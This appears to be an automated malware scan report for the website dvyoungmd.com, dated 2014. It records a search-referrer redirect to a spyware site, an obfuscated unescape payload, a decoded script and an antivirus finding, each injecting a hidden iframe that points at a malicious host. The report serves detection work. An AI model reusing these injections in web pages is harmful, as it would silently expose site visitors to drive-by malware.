Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://dvyoungmd.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: dvyoungmd.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 17 Sep 2014 17:16:25 GMT Location: http://www.spyware-systems.info/0/go.php?sid=2 Server: Apache Content-Length: 230 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://dvyoungmd.com/ | 200 OK Content-Length: 3100 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write(unescape('%3C')+unescape('%69%66%72%61')+unescape('%6D')+unescape('%65%20%73%72')+unescape('%63')+unescape('%3D%27')+unescape('%68%74%74%70')+unescape('%3A%2F')+unescape('%2F%6E%61%66')+unescape('%66%73')+unescape('%64%61%73%2E')+unescape('%63%6F%6D')+unescape('%2F%6E%65%6F')+unescape('%6E%2F')+unescape('%6E%65')+unescape('%6F%6E')+unescape('%2F%69%6E%64')+unescape('%65')+unescape('%78%2E%70')+unescape('%68%70%27')+unescape('%20')+unescape('%77%69')+unescape('%64%74%68')+unescape('%3D')+unescape('%31%20%68')+unescape('%65%69')+unescape('%67%68%74')+unescape('%3D%31%20')+unescape('%73%74%79%6C')+unescape('%65')+unescape('%3D%27')+unescape('%76%69')+unescape('%73%69%62')+unescape('%69%6C%69')+unescape('%74%79')+unescape('%3A%68%69')+unescape('%64%64%65')+unescape('%6E%27')+unescape('%3E%3C%2F')+unescape('%69%66%72')+unescape('%61')+unescape('%6D%65%3E')+'');
Decoded script:
<SCRIPT>window.status='Done';document.write('<iframe name=4 src=\'http://art-kyiv.com/stds/go.php?sid=4?'+Math.round(Math.random()*166581)+'d8ba468b8\' width=669 height=249 style=\'display: none\'></iframe>')</SCRIPT>
Antivirus reports:
Malicious iFrame found. size: 196x104 style: hidden src: http://shopfilmlifescience.cn:8080/index.php
This URL is marked by Google as suspicious.
<iframe src="http://shopfilmlifescience.cn:8080/index.php" width=196 height=104 style="visibility: hidden">
http://dvyoungmd.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dvyoungmd.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dvyoungmd.com/
Result: dvyoungmd.com is not infected or malware details are not published yet.